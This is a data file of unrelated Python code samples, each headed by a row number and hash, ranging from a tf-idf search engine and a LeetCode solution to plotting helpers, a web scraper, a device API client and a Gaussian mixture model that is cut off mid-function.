        nlp_list = nlp(data)
        for term in nlp_list:
            if term in list_of_terms:
                if ids[filename] in list_of_terms[term]:
                    # Term already seen in this document: bump its count.
                    list_of_terms[term][ids[filename]] = list_of_terms[term][ids[filename]] + 1
                else:
                    list_of_terms[term].update({ids[filename]: 1})
            else:
                list_of_terms.update({term: {ids[filename]: 1}})
    return list_of_terms
def getTfQuery(list_of_terms):
    """Count the term frequencies of the global `query` into
    `list_of_terms` (word -> count) and return the mutated dict.

    Bug fix: membership used to be tested against the module-level
    `list_of_query` instead of the dict actually being updated, which
    raised KeyError (or NameError) when called with any other dict.
    """
    for word in query:
        if word in list_of_terms:
            list_of_terms[word] = list_of_terms[word] + 1
        else:
            list_of_terms[word] = 1
    return list_of_terms
def getWeightDocs(tfidf_scores, list_of_terms):
    """Fill `tfidf_scores` (term -> {doc_id: tf*idf}) from the raw term
    frequencies in `list_of_terms`, recording each idf in the global
    `inverse_term_freq`.

    idf(term) = log10(total_documents / document_frequency(term)); it is
    recomputed per (term, doc) pair although it only depends on the term.
    NOTE(review): `total_documents / len(value)` relies on Python 3 true
    division — under Python 2 it would floor to 0 for most terms.
    """
    for term, value in list_of_terms.items():
        for docID, frequency in value.items():
            idf_value = math.log10(float(total_documents / len(value)))
            tfidf = idf_value * frequency
            if term in inverse_term_freq:
                if docID in inverse_term_freq[term]:
                    inverse_term_freq[term][docID] = idf_value
                    tfidf_scores[term][docID] = tfidf
                else:
                    inverse_term_freq[term].update({docID: idf_value})
                    tfidf_scores[term].update({docID: tfidf})
            else:
                inverse_term_freq.update({term: {docID: idf_value}})
                tfidf_scores.update({term: {docID: tfidf}})
    return tfidf_scores
def getWeightQuery(tfidf_scores, list_of_terms):
    """Compute tf-idf weights for the query terms (term -> idf * tf).

    NOTE(review): the inner loop overwrites tfidf_scores[term] for every
    docID; since the idf stored per (term, docID) is the same for all
    documents of a term this still yields idf * tf, but the loop is
    redundant.  Raises KeyError for a query term absent from the corpus.
    """
    for term, value in list_of_terms.items():
        for docID, idf in inverse_term_freq[term].items():
            tfidf_scores.update({term: inverse_term_freq[term][docID] * value})
    return tfidf_scores
def getDistanceDocs(tfidf, distance_dict):
    """Compute the Euclidean norm of every document's tf-idf vector.

    Also (re)builds the global `docs_dict` pivot: doc_id -> {term: weight}.
    Returns `distance_dict` mapping doc_id -> vector norm.
    NOTE(review): the local name `sum` shadows the builtin.
    """
    sum = 0
    # Pivot term -> {doc: weight} into doc -> {term: weight}.
    for term, value in tfidf.items():
        for docID, weight in value.items():
            if docID in docs_dict:
                docs_dict[docID][term] = weight
            else:
                docs_dict.update({docID: {term: weight}})
    for doc, words in docs_dict.items():
        for word, values in words.items():
            sum = sum + math.pow(float(values), 2)
        distance = math.sqrt(sum)
        distance_dict.update({doc: distance})
        # Reset the accumulator for the next document.
        sum = 0
    return distance_dict
def getDistanceQuery(tfidf):
    """Return the Euclidean (L2) norm of the query's tf-idf weight vector."""
    squared_total = 0
    for weight in tfidf.values():
        squared_total += math.pow(float(weight), 2)
    return math.sqrt(squared_total)
# ---------------------------------------------------------------------------
# Main script: a tiny tf-idf search engine over the documents in `sub_dir`.
# Reads a query, scores every document with cosine similarity, prints the
# ranking, dumps the scores to result-tf.csv and shows the best match.
# NOTE(review): indentation was lost in this copy of the file; loop bodies
# below were reconstructed from the obvious data flow.
# ---------------------------------------------------------------------------
sub_dir = "data"
query = input("query : ")
print('')
query = nlp(query)
print('The query is "', query, '"')

# initial dicts / accumulators
list_of_docs = {}
list_of_query = {}
total_documents = 0
inverse_term_freq = {}
tfidf_docs = {}
tfidf_query = {}
distance_query = 0
distance_docs = {}
docs_dict = {}

# collect all the filenames and assign them ids
list_of_filenames = findall(sub_dir)
total_documents = len(list_of_filenames)
ids = assignids(list_of_filenames)

# calculate tf-idf (weight) for documents & query
list_of_docs.update(getTfDoc(list_of_docs))
list_of_query.update(getTfQuery(list_of_query))
tfidf_docs.update(getWeightDocs(tfidf_docs, list_of_docs))
tfidf_query.update(getWeightQuery(tfidf_query, list_of_query))

print('===================== CALCULATION =====================')
print('query weight', tfidf_query)
print('doc weight', tfidf_docs)

# vector norms of the query and of every document
distance_query = (getDistanceQuery(tfidf_query))
distance_docs.update(getDistanceDocs(tfidf_docs, distance_docs))
print('distance query ', distance_query)
print('distance docs ', distance_docs)

# inner product between the query vector and every document vector
inner_product = {}
sum_ip = 0
for docID, values in docs_dict.items():
    for word, value in tfidf_query.items():
        if word in values:
            sum_ip = sum_ip + float(value * values[word])
    inner_product.update({docID: sum_ip})
    sum_ip = 0

for docID, score in inner_product.items():
    if score > 0:
        print('dot product ', getFilenameById(docID, ids), ' ', inner_product[docID])
print("=========================================================\n")

# cosine similarity = dot_product / (|query| * |doc|)
similarity = {}
for docID, value in inner_product.items():
    for doc, values in distance_docs.items():
        if docID == doc:
            calculate = value / float(distance_query * distance_docs[doc])
            similarity.update({getFilenameById(docID, ids): calculate})
            calculate = 0

sorted_similarity = OrderedDict(sorted(similarity.items(), key=lambda x: x[1], reverse=True))
print('')
print("========= Displaying results in relevance order =========")
for docID, score in sorted_similarity.items():
    if score > 0:
        print(docID, ' : ', similarity[docID])

# persist the scores
try:
    with open('result-tf.csv', 'w') as csv_file:
        writer = csv.writer(csv_file)
        for key, value in similarity.items():
            writer.writerow([key, value])
except IOError:
    print('I/O error')
print("\n")

# show the text of the best-ranked document
extract = []
for doc, score in sorted_similarity.items():
    extract.append(getDocument(doc, sub_dir))
print("========================================== EXTRACTED TEXT ==========================================")
print('\n', textwrap.fill(extract[0], 100))
print("====================================================================================================")
|
21,943 | c8c9b4297e99c201b4404b7b7c68c75d27fe5a45 | # @lc app=leetcode id=264 lang=python3
#
# [264] Ugly Number II
#
# @lc tags=math;dynamic-programming;heap
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
#
#
# @lc idea=end
# @lc group=
# @lc rank=
# @lc code=start
class Solution:
    def nthUglyNumber(self, n: int) -> int:
        """Return the n-th ugly number — a positive integer whose only
        prime factors are 2, 3 and 5 (the sequence starts at 1).

        The method was an unimplemented stub returning None; this is the
        classic three-pointer DP: each ugly number is a smaller ugly
        number multiplied by 2, 3 or 5.  O(n) time, O(n) space.
        """
        ugly = [1] * n
        i2 = i3 = i5 = 0
        for k in range(1, n):
            nxt = min(ugly[i2] * 2, ugly[i3] * 3, ugly[i5] * 5)
            ugly[k] = nxt
            # Advance every pointer that produced nxt so duplicates
            # (e.g. 6 = 2*3 = 3*2) are emitted only once.
            if nxt == ugly[i2] * 2:
                i2 += 1
            if nxt == ugly[i3] * 3:
                i3 += 1
            if nxt == ugly[i5] * 5:
                i5 += 1
        return ugly[-1]
# @lc code=end
# @lc main=start
# Ad-hoc smoke test: print the expected and actual answer for the two
# LeetCode examples.
if __name__ == '__main__':
    print('Example 1:')
    print('Input : ')
    print('n = 10')
    print('Exception :')
    print('12')
    print('Output :')
    print(str(Solution().nthUglyNumber(10)))
    print()

    print('Example 2:')
    print('Input : ')
    print('n = 1')
    print('Exception :')
    print('1')
    print('Output :')
    print(str(Solution().nthUglyNumber(1)))
    print()
    pass
# @lc main=end
# Read N and a list of N integers; print True iff every element is
# positive AND at least one element is a palindrome.
# Idiom fix: `[True if x > 0 else False for x in m]` was a redundant
# materialized list — generator expressions short-circuit inside
# all()/any().
n, m = int(input()), list(map(int, input().split()))
print(all(x > 0 for x in m) and any(str(x) == str(x)[::-1] for x in m))
21,945 | d06a9b9af73d8765626e9687bda60702e68ca033 | #!/usr/bin/env python3
"""
Preprocessing the database
"""
import pandas as pd
def preprocessing(name_file):
    """Load, clean, subsample, split and normalize time-series data
    from a CSV file.

    NOTE(review): this function needs pandas, but the module-level
    `import pandas as pd` is commented out in this file — it must be
    re-enabled for the function to run.

    Arguments:
        name_file: path of the CSV file that contains the data; it must
            include a unix-seconds 'Timestamp' column.

    Returns:
        train: first 70% of the rows, z-scored with the train statistics
        validation: next 20% of the rows (same normalization)
        test: final 10% of the rows (same normalization)
    """
    db_data = pd.read_csv(name_file).dropna()
    db_data['Timestamp'] = pd.to_datetime(db_data['Timestamp'], unit='s')
    # Keep only rows from 2017 onwards.
    db_data = db_data[db_data['Timestamp'].dt.year >= 2017]
    db_data.reset_index(inplace=True, drop=True)
    db_data = db_data.drop(['Timestamp'], axis=1)
    # Take every 60th row — presumably downsampling minute-level data to
    # hourly; TODO confirm the source granularity.
    db_data = db_data[0::60]

    n = len(db_data)
    # Split data 70 / 20 / 10 chronologically.
    train = db_data[0:int(n * 0.7)]
    validation = db_data[int(n * 0.7):int(n * 0.9)]
    test = db_data[int(n * 0.9):]

    # Normalize all splits with the *training* mean/std so no statistics
    # leak from validation/test into training.
    train_mean = train.mean()
    train_std = train.std()
    train = (train - train_mean) / train_std
    validation = (validation - train_mean) / train_std
    test = (test - train_mean) / train_std

    return train, validation, test
|
21,946 | 50a59aa08f4d54ceccad7c513aadd293d1d2675d | import tensorflow as tf
from tensorflow.keras.losses import Loss
class PointLoss(Loss):
    """Sparse softmax cross-entropy between `logits` and `labels` plus an
    orthogonality regularizer on the feature-transform matrix.

    The regularizer penalises ||F·Fᵀ − I||²/2 for the feature transform
    `ft`, scaled by the weight `rw`.
    """

    def __init__(self, ft) -> None:
        # Bug fix: the Keras Loss base class was never initialised, which
        # breaks the base class's reduction/name handling.
        super().__init__()
        self.ft = ft    # feature-transform matrices, rank 3: (batch, K, K)
        self.rw = 0.001  # regularization weight

    def __call__(self, y_true, y_pred, sample_weight=None):
        # Per-sample cross entropy, then mean over the batch.
        cce = tf.keras.losses.SparseCategoricalCrossentropy(reduction=tf.keras.losses.Reduction.NONE)
        class_loss = cce(y_true, y_pred)
        class_loss = tf.math.reduce_mean(class_loss)
        # ||F Fᵀ − I||² / 2 via tf.nn.l2_loss.
        mat = tf.linalg.matmul(self.ft, tf.transpose(self.ft, perm=[0, 2, 1]))
        mat -= tf.eye(self.ft.shape[1])
        reg = tf.nn.l2_loss(mat)
        return class_loss + reg * self.rw
|
21,947 | 386cbe1db55cb4fbee189104113d68d67e58fe52 | import os
import sqlite3
import csv
from typing import List
DB_NAME = 'user_account_app.db'


class Database:
    """Thin SQLite wrapper for the user-account app.

    Creates a fresh database on construction, loads seed users from
    user.csv, and exposes simple execute/select helpers.  Fix: every
    connection is now closed in a try/finally, so exceptions no longer
    leak open connections.
    """

    def __init__(self):
        # Start from a clean database on every run, then load seed data.
        if os.path.exists(DB_NAME):
            os.remove(DB_NAME)
        self.create_user_table()
        self.insert_user_rows_from_csv()

    def create_user_table(self) -> None:
        """Create the `user` table."""
        query_str = """
        CREATE TABLE user(
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        email TEXT UNIQUE,
        first_name TEXT,
        last_name TEXT,
        password TEXT,
        phone_number INTEGER,
        is_admin INTEGER,
        invitation_code TEXT)
        """
        self.execute(query_str=query_str)

    def get_connection(self) -> sqlite3.Connection:
        """Open a new connection to the application database."""
        return sqlite3.connect(DB_NAME)

    def insert_user_rows_from_csv(self):
        """Bulk-load the rows of user.csv into the user table."""
        with open('user.csv', 'r') as fp:
            dr = csv.DictReader(fp)
            to_db = [
                (i['email'], i['first_name'], i['last_name'], i['password'],
                 i['phone_number'], i['is_admin'], i['invitation_code']) for i in dr]
        conn = self.get_connection()
        try:
            conn.executemany(
                """
                INSERT INTO user
                (email, first_name, last_name, password,
                phone_number, is_admin, invitation_code)
                VALUES (?, ?, ?, ?, ?, ?, ?)""",
                to_db)
            conn.commit()
        finally:
            conn.close()

    def execute(self, query_str) -> bool:
        """Run a single statement; return True on success, False (after
        printing the error) on any failure."""
        try:
            conn = self.get_connection()
            try:
                conn.execute(query_str)
                conn.commit()
            finally:
                conn.close()
            return True
        except Exception as e:
            print(e)
            return False

    def select(self, query_str: str) -> List[tuple]:
        """Run a query and return all result rows."""
        conn = self.get_connection()
        try:
            return conn.execute(query_str).fetchall()
        finally:
            conn.close()

    def select_one(self, query_str: str) -> tuple:
        """Run a query and return only the first result row."""
        conn = self.get_connection()
        try:
            return conn.execute(query_str).fetchone()
        finally:
            conn.close()
21,948 | c447d79b2faa387c8c3ddacc108c8a0f29d36b8f | "Useful functions for 3D plots"
import numpy as np
import mpl_toolkits.mplot3d.axes3d as ax3d
from .utils import grab_current_axis
from .angle_utils import cartesian_to_latitude_longitude
import cartopy.crs as ccrs
from matplotlib.collections import PatchCollection
import matplotlib.pyplot as plt
from collections.abc import Iterable
LAEA = ccrs.LambertAzimuthalEqualArea(central_latitude=90)
TRANSFORM = ccrs.PlateCarree()
@grab_current_axis
def plot_faces(faces, face_colors=None, edge_colors=None, ax=None, **kwargs):
    """Draw a set of 3D faces as a single Poly3DCollection.

    Parameters
    ----------
    faces: list
        Coordinates of the faces to plot; each element is a numpy array
        of shape (n_points, 3).
    face_colors: color or sequence of colors (default: None)
        Facecolor(s) of the collection; a sequence is cycled over the
        patches.
    edge_colors: color or sequence of colors or 'face'
        Edgecolor(s) of the collection; 'face' matches the facecolor.
    ax: mplot3d.axes3d.Axes3D
        Target axis; the decorator grabs the current axis by default.
    **kwargs:
        Forwarded to Poly3DCollection.

    Returns
    -------
    collection: mplot3d.art3d.Poly3DCollection
        The Poly3DCollection that was added to `ax`.
    """
    collection = ax3d.art3d.Poly3DCollection(faces, **kwargs)
    if face_colors is not None:
        collection.set_facecolor(face_colors)
    if edge_colors is not None:
        collection.set_edgecolor(edge_colors)
    ax.add_collection3d(collection)
    return collection
@grab_current_axis
def fill_projected_faces(lat_face_all, lon_face_all,
                         face_colors=None, edge_colors=None,
                         ax=None, **kwargs):
    """Plot a list of faces from geographic coordinates using a LAEA projection.

    The faces are plotted as a matplotlib PatchCollection, each one of the
    patches being generated with matplotlib's `fill` function.

    Parameters
    ----------
    lat_face_all: array, shape = (n_faces, n_vertices)
        The latitudes of the vertices for the `n_faces` faces, in degrees.
    lon_face_all: array, shape = (n_faces, n_vertices)
        The longitudes of the vertices for the `n_faces` faces, in degrees.
    face_colors: string, iterable of len n_faces or None (default: None)
        If an iterable of length `n_faces`, one color per face; otherwise the
        single value is replicated for every face. `facecolor`/`fc` in
        **kwargs take precedence over this argument.
    edge_colors: string, iterable of len n_faces or None (default: None)
        Same convention as `face_colors`; defaults to the face colors when
        None. `edgecolor`/`ec` in **kwargs take precedence.
    ax: matplotlib axis (default: None)
        Matplotlib axis with a cartopy LambertAzimuthalEqualArea projection.
        If None (default), the current axis is grabbed by the decorator.
    **kwargs
        Additional key-word arguments passed to matplotlib's fill function
        for each facet.

    Returns
    -------
    ax: matplotlib axis
        The axis the resulting PatchCollection was added to.
        (NOTE(review): an earlier docstring advertised the PatchCollection
        itself; the code has always returned `ax`, so that is kept.)

    Notes
    -----
    The patches overlapping the south pole and the prime meridian are ignored
    due to a rendering issue. The criterion for ignoring such facets is having
    one vertex with latitude below -85 deg and one vertex whose longitude has
    an absolute value below 5 deg.
    """
    # Replicate the input face color if needed
    n_faces = len(lat_face_all)
    if kwargs.get("facecolor") is not None:
        face_colors = [kwargs.get("facecolor")] * n_faces
    elif kwargs.get("fc") is not None:
        face_colors = [kwargs.get("fc")] * n_faces
    elif face_colors is None or not (isinstance(face_colors, Iterable) and len(face_colors) == n_faces):  # noqa 501
        # BUG FIX: the original condition was parenthesized as
        # `(isinstance(...) and len(face_colors)) != n_faces`, which compares
        # a boolean (or a length) to n_faces and could wrongly replicate a
        # valid per-face color list.
        face_colors = [face_colors] * n_faces
    # Replicate the edge color if needed or use the face color
    if kwargs.get("ec") is not None:
        edge_colors = [kwargs.get("ec")] * n_faces
    elif kwargs.get("edgecolor") is not None:
        edge_colors = [kwargs.get("edgecolor")] * n_faces
    elif isinstance(edge_colors, Iterable) and len(edge_colors) != n_faces:
        edge_colors = [edge_colors] * n_faces
    elif edge_colors is None:
        edge_colors = face_colors
    # Remove the parsed colors so `plt.fill` only sees the per-face fc/ec
    kwargs.pop("facecolor", None)
    kwargs.pop("edgecolor", None)
    kwargs.pop("fc", None)
    kwargs.pop("ec", None)
    # Loop over the coordinates of the faces
    patches = []  # list of patches that will be converted to a PatchCollection
    for face_idx, (lat, lon) in enumerate(zip(lat_face_all, lon_face_all)):
        # Skip the faces touching both the south pole and the prime meridian
        if not (np.any(lat <= -85) and np.any(np.abs(lon) <= 5)):
            filling_transform = ccrs.Geodetic()
            # Duplicate the 1st element of the coordinates to close the shapes
            lat, lon = np.append(lat, lat[0]), np.append(lon, lon[0])
            # Add the resulting patch to the list of patches
            patches += plt.fill(lon, lat, transform=filling_transform,
                                fc=face_colors[face_idx],
                                ec=edge_colors[face_idx],
                                **kwargs)
    patch_collection = PatchCollection(patches)
    ax.add_collection(patch_collection)
    return ax
def fill_projected_faces_euclidean(x, y, z, **kwargs):
    """Plot faces given in euclidean coordinates on a LAEA projection.

    Each face's (x, y, z) vertex coordinates are first converted to
    geographic latitude/longitude (degrees), then handed to
    `fill_projected_faces`; see that function for the supported keyword
    arguments and return value.

    Parameters
    ----------
    x, y, z: arrays, shape = (n_faces, n_vertices)
        3-dimensional euclidean coordinates of the face vertices.
    **kwargs
        Forwarded unchanged to `fill_projected_faces`.
    """
    # Convert every face to (latitude, longitude) pairs, in degrees.
    geographic = np.array([
        cartesian_to_latitude_longitude(xf, yf, zf, deg=True)
        for xf, yf, zf in zip(x, y, z)
    ])  # shape: (n_faces, 2, n_vertices)
    lat_face_all = geographic[:, 0, :]
    lon_face_all = geographic[:, 1, :]
    return fill_projected_faces(lat_face_all, lon_face_all, **kwargs)
@grab_current_axis
def plot_projected(lon, lat, ax=None, **kwargs):
    """Plot a line through (lon, lat) points on the LAEA-projected axis."""
    # Project the geographic points into LAEA coordinates before plotting.
    projected_points = LAEA.transform_points(TRANSFORM, lon, lat)
    return ax.plot(*projected_points.T, transform=LAEA, **kwargs)
def plot_projected_euclidean(x, y, z, **kwargs):
    """Plot euclidean (x, y, z) points as a line on the crs projection."""
    latitude, longitude = cartesian_to_latitude_longitude(x, y, z, deg=True)
    return plot_projected(longitude, latitude, **kwargs)
@grab_current_axis
def scatter_projected(lon, lat, ax=None, **kwargs):
    """Scatter (lon, lat) points on the projected axis via TRANSFORM."""
    return ax.scatter(lon, lat, transform=TRANSFORM, **kwargs)
def scatter_projected_euclidean(x, y, z, **kwargs):
    """Scatter euclidean (x, y, z) points on the crs projection."""
    latitude, longitude = cartesian_to_latitude_longitude(x, y, z, deg=True)
    return scatter_projected(longitude, latitude, **kwargs)
|
21,949 | e3efba784c7ca23457e9bf613316c57d77816f94 | import turtle
# Pen used for all drawing in this script.
example = turtle.Turtle()
example.color("cyan")
# Per the turtle docs, a speed argument above 10 maps to 0 (fastest).
example.speed(100)
turtle.bgcolor("black")
def draw_square(length):
    """Draw one square with sides of `length` units."""
    for side_a in range(4):
        example.forward(length)
        example.right(90)

# NOTE(review): indentation was lost in this source; the 50-unit square and
# the penup/back/pendown repositioning are assumed to be one-off top-level
# demo steps (they ignore `length`) — confirm against the original file.
for side_b in range(4):
    example.forward(50)
    example.right(90)
example.penup()
example.back(20)
example.pendown()
# Draw 80 small squares, advancing and rotating 5 degrees each time,
# producing a ring pattern.
for square in range(80):
    draw_square(5)
    example.forward(5)
    example.left(5)
example.hideturtle()
turtle.done()
|
21,950 | 4a44603649957ad5a493b7219a43d81f9fa11fb9 | from urllib.parse import urlencode
from requests.exceptions import RequestException
import requests
import json
from bs4 import BeautifulSoup
def get_page_index(offset, keyword):
    """Fetch one page of Toutiao search results; return the JSON text or None."""
    params = {
        'offset': offset,
        'format': 'json',
        'keyword': keyword,
        'autoload': 'true',
        'count': '20',
        'cur_tab': 3,
    }
    url = 'https://www.toutiao.com/search_content/?' + urlencode(params)
    try:
        response = requests.get(url)
    except RequestException:
        print('请求索引页出错')
        return None
    if response.status_code == 200:
        return response.text
    return None
def parse_page_index(html):
    """Yield the article URL of every entry in a search-result JSON string."""
    payload = json.loads(html)
    if not payload or 'data' not in payload:
        return
    for entry in payload['data']:
        yield entry.get('article_url')
def get_page_detail(url):
    """Fetch an article detail page; return its HTML text or None on failure."""
    try:
        response = requests.get(url)
    except RequestException:
        print('请求详情页出错',url)
        return None
    if response.status_code == 200:
        return response.text
    return None
def parse_page_detail(html):
    """Print the page <title> and, if present, the inline gallery JSON."""
    # BUG FIX: the module never imported `re`, so this function raised
    # NameError on every call; import it locally to avoid touching the
    # module header.
    import re

    soup = BeautifulSoup(html, 'lxml')
    title = soup.select('title')[0].get_text()
    print(title)
    # `re.search` accepts an already-compiled pattern as its first argument.
    images_pattern = re.compile('var gallery = (.*?);', re.S)
    result = re.search(images_pattern, html)
    if result:
        print(result.group(1))
def main():
    """Crawl the first result page for '街拍' and parse each article found."""
    index_html = get_page_index(0, '街拍')
    for article_url in parse_page_index(index_html):
        detail_html = get_page_detail(article_url)
        if detail_html:
            parse_page_detail(detail_html)


if __name__ == '__main__':
    main()
21,951 | b974638334ba2fe765ebd965c27c28f22f47cb06 | # -*-coding: utf-8 -*-
#@Time : 2019/12/12 10:37
#@Author : zhongqingqing
#@FileName : bns_api_publicDevice.py
from base.decorators import allure_attach
from bns.public import BusinessApi
class BnsApi(BusinessApi):
    """Business-layer wrapper around the public-device management APIs.

    NOTE(review): the original class defined ``bns_publicDevice_add`` twice
    with identical request logic; Python silently keeps only the later
    definition, so the first copy was dead code and has been removed here.
    """

    def __init__(self, username=None, password=None):
        super().__init__(username=username, password=password)
        # API definitions (url / method / contentType / data field names)
        # loaded from the YAML config matching this module's name.
        self._config_publicDevice = self.base_yaml_info(
            curr_file=__file__,
            module_key=__name__.split(".")[-2]
        )

    @allure_attach("公共服务设备注册")
    def bns_publicDevice_add(self, headers=None, deviceType=None, manufacturerType=None, deviceCode=None,
                             deviceBarCode=None, hardwareVersion=None, lensType=None):
        """
        Register a device with the public service.

        :param headers: request headers (auth token etc.)
        :param deviceType: device type, default: 0
        :param manufacturerType: manufacturer type, default: 0
        :param deviceCode: device code, default length: 14
        :param deviceBarCode: device bar code, default length: 10
        :param hardwareVersion: hardware version, e.g. V500001001, V500002001, V500003001
        :param lensType: lens model, e.g. 6, 8, 12, 16
        :return: response of the business request
        """
        api_info = self._config_publicDevice["add"]
        http_url = api_info["url"]
        http_port = api_info.get("port")
        http_method = api_info["method"]
        http_contentType = api_info["contentType"]
        http_data = api_info["data"]
        # Request payload; None-valued entries are filtered out below.
        data = {
            http_data["deviceType"]: deviceType,
            http_data["manufacturerType"]: manufacturerType,
            http_data["deviceCode"]: deviceCode,
            http_data["deviceBarCode"]: deviceBarCode,
            http_data["hardwareVersion"]: hardwareVersion,
            http_data["lensType"]: lensType,
        }
        data = self.base_filter_data(data)
        response = self.business_request(
            # Device registration goes through the shopping-center IoT platform.
            request_url="{}{}".format("https://192.168.100.154:8443", http_url),
            request_method=http_method,
            request_type=http_contentType,
            request_data=data,
            headers=headers
        )
        return response

    @allure_attach("公共服务设备列表")
    def bns_publicDevice_list(self, headers=None, deviceBarCode=None, deviceCode=None, deviceType=None,
                              deviceTypeName=None, startTime=None, endTime=None, hardwareVersion=None,
                              isEnable=None, lensType=None, manufacturerType=None, manufacturerTypeName=None,
                              pageNo=None, pageSize=None):
        """
        Query the paged device list.

        :param headers: request headers
        :param deviceBarCode: device bar code
        :param deviceCode: device code
        :param deviceType: device type
        :param deviceTypeName: device type name
        :param startTime: query start time
        :param endTime: query end time
        :param hardwareVersion: hardware version
        :param isEnable: whether the device is enabled
        :param lensType: lens model
        :param manufacturerType: manufacturer
        :param manufacturerTypeName: manufacturer name
        :param pageNo: page number
        :param pageSize: entries per page
        :return: response of the business request
        """
        api_info = self._config_publicDevice["list"]
        http_url = api_info["url"]
        http_port = api_info.get("port")
        http_method = api_info["method"]
        http_contentType = api_info["contentType"]
        http_data = api_info["data"]
        # Request payload; None-valued entries are filtered out below.
        data = {
            http_data["deviceBarCode"]: deviceBarCode,
            http_data["deviceCode"]: deviceCode,
            http_data["deviceType"]: deviceType,
            http_data["deviceTypeName"]: deviceTypeName,
            http_data["startTime"]: startTime,
            http_data["endTime"]: endTime,
            http_data["hardwareVersion"]: hardwareVersion,
            http_data["isEnable"]: isEnable,
            http_data["lensType"]: lensType,
            http_data["manufacturerType"]: manufacturerType,
            http_data["manufacturerTypeName"]: manufacturerTypeName,
            http_data["pageNo"]: pageNo,
            http_data["pageSize"]: pageSize,
        }
        data = self.base_filter_data(data)
        response = self.business_request(
            request_url="{}{}".format("https://192.168.100.154:8443", http_url),
            request_method=http_method,
            request_type=http_contentType,
            request_data=data,
            headers=headers
        )
        return response

    @allure_attach("公共服务设备删除")
    def bns_publicDevice_delete(self, headers=None, deviceCode=None):
        """
        Delete a device by its code.

        :param headers: request headers
        :param deviceCode: device code
        :return: response of the business request
        """
        api_info = self._config_publicDevice["delete"]
        http_url = api_info["url"]
        http_port = api_info.get("port")
        http_method = api_info["method"]
        http_contentType = api_info["contentType"]
        http_data = api_info["data"]
        # Request payload; None-valued entries are filtered out below.
        data = {
            http_data["deviceCode"]: deviceCode,
        }
        data = self.base_filter_data(data)
        response = self.business_request(
            request_url="{}{}".format("https://192.168.100.154:8443", http_url),
            request_method=http_method,
            request_type=http_contentType,
            request_data=data,
            headers=headers
        )
        return response
if __name__ == '__main__':
    api = BnsApi()
    # BUG FIX: the device code used to be passed positionally, landing in the
    # `headers` parameter; pass it by keyword so it reaches `deviceCode`.
    res = api.bns_publicDevice_delete(deviceCode="VzB0GGPjLgGgcj")
    print(res)
21,952 | c04ba5240766f2525866e56581ad2d599086da8b | def main():
    # Number of cards; read to consume the input line (the list length is
    # what the computation actually uses).
    num_ans = int(input())
    # All card values on one whitespace-separated line.
    card_list = list(map(int, input().split()))
    # Sort descending: players alternately take the largest remaining card.
    card_list.sort()
    card_list.reverse()
    # First player takes even positions, second takes odd; print the
    # difference (total - 2 * second player's share).
    print(sum(card_list) - sum(card_list[1::2]) * 2)
if __name__ == '__main__':
    main()
|
21,953 | 7ce67174ce810e01eadd546aa6f0b78611708f1f | from logging import Logger
from typing import Optional
from api.models import UserModel
from api.schemas import user_schemas
from sqlalchemy.orm import Session
class UserRepository:
    """Data-access layer for ``UserModel`` rows."""

    def __init__(self, logger: Logger) -> None:
        # BUG FIX: the original chained `self._logger = self._logger = ...`,
        # a redundant double assignment; a single assignment suffices.
        self._logger = logger.getChild(self.__class__.__name__)

    def create(self, db: Session, user: UserModel) -> Optional[UserModel]:
        """Persist *user*, refresh it from the DB and return it; re-raise on failure."""
        try:
            self._logger.debug(f"create a new user for user {user.username}.")
            db.add(user)
            db.commit()
            db.refresh(user)
            return user
        except Exception:
            # Narrowed from a bare `except:`; log the traceback, then propagate.
            self._logger.exception("create user fail.")
            raise

    def get_user(self, db: Session, username: str) -> user_schemas.UserInDB:
        """Return the first user matching *username* (or None if absent)."""
        return db.query(UserModel).filter(UserModel.username == username).first()
|
21,954 | 7391cb242a740e98e97976727c176b4cfee8c2db | import numpy as np
import matplotlib.pyplot as plt
class GaussianMixture:
    """Gaussian mixture clustering fitted with EM (textbook ch. 9 reference impl)."""

    def __init__(self,k=3,max_iter=50):
        # k: number of mixture components; max_iter: EM iterations.
        self.k=k
        self.max_iter=max_iter
        self.labels_=None   # hard cluster label per sample after fit()
        self.C=None         # dict: cluster index -> list of sample indices
        self.alpha=None     # mixing weights, shape (k,)
        self.mu=None        # component means
        self.cov=None       # component covariance matrices
        self.gamma=None     # responsibilities, shape (n_samples, k)
        pass

    # Gaussian mixture clustering algorithm (p.210, Fig. 9.6)
    def fit(self,X):
        # Initialization as on p.210: uniform mixing weights, fixed sample
        # points as means, small isotropic 2x2 covariances.
        # NOTE(review): the hard-coded seed indices and covariance stack
        # assume k == 3, 2-D data and at least 27 samples — confirm before
        # reusing on other data.
        self.alpha=np.zeros((self.k,))
        for i in range(self.k):
            self.alpha[i]=1./self.k
        mu_indices=[5,21,26]
        self.mu=X[mu_indices]
        self.cov=np.array([[[0.1,0.],[0.0,0.1]],[[0.1,0.],[0.,0.1]],[[0.1,0.],[0.,0.1]]])
        self.gamma=np.zeros((X.shape[0],self.k))
        for _ in range(self.max_iter):
            # E step: responsibility gamma[j, i] of component i for sample j.
            for j in range(X.shape[0]):
                alpha_p=np.zeros((self.k,))
                sum=0.
                for i in range(self.k):
                    alpha_p[i]=self.alpha[i]*self._p(X[j],self.mu[i],self.cov[i])
                    sum+=alpha_p[i]
                self.gamma[j,:]=alpha_p/sum
            # M step: re-estimate means, covariances and mixing weights.
            for i in range(self.k):
                sum_gamma_i=np.sum(self.gamma[:,i])
                self.mu[i]=X.T.dot(self.gamma[:,i])/sum_gamma_i
                numerator=0.
                for j in range(X.shape[0]):
                    numerator+=(self.gamma[j,i]*((X[j]-self.mu[i]).reshape(-1,1).dot((X[j]-self.mu[i]).reshape(1,-1))))
                self.cov[i]=numerator/sum_gamma_i
                self.alpha[i]=sum_gamma_i/X.shape[0]
        # Hard assignment: most responsible component per sample.
        self.labels_=np.argmax(self.gamma,axis=1)
        self.C={}
        for i in range(self.k):
            self.C[i]=[]
        for j in range(len(self.labels_)):
            self.C[self.labels_[j]].append(j)

    def predict(self,X):
        # Same E step as fit(), using the learned parameters; returns hard labels.
        gamma = np.zeros((X.shape[0], self.k))
        for j in range(X.shape[0]):
            alpha_p = np.zeros((self.k,))
            sum = 0.
            for i in range(self.k):
                alpha_p[i] = self.alpha[i] * self._p(X[j], self.mu[i], self.cov[i])
                sum += alpha_p[i]
            gamma[j, :] = alpha_p / sum
        return np.argmax(gamma,axis=1)

    # Eq. 9.28: multivariate Gaussian density.
    @classmethod
    def _p(cls,x,mu,cov):
        exp_coef=-0.5*((x-mu).T.dot(np.linalg.inv(cov)).dot(x-mu))
